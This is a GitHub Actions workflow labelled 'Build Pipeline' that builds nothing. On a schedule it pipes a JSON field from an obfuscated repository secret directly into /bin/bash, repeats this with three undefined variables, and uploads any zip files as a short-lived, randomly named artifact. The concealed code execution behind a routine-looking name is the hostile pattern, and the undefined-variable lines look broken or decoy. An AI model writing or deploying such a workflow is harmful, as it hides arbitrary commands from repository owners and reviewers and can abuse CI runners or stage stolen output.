name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '35 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
env:
  RUNNER_DEBUG: 0
jobs:
  task:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Apply
        env:
          z57: ${{ secrets.z57 }}
        run: |
          printf '%s' "$z57" | jq -r .oxyu76128 | /bin/bash
          printf '%s' "$cfog0031" | jq -r .wrif8921 | /bin/bash
          printf '%s' "$rqjn03008" | jq -r .psmes12353 | /bin/bash
          printf '%s' "$qqh6" | jq -r .b49730 | /bin/bash

      - name: Upload output
        uses: actions/upload-artifact@v4
        with:
          name: rIRDgM98
          path: "*.zip"
          retention-days: 1
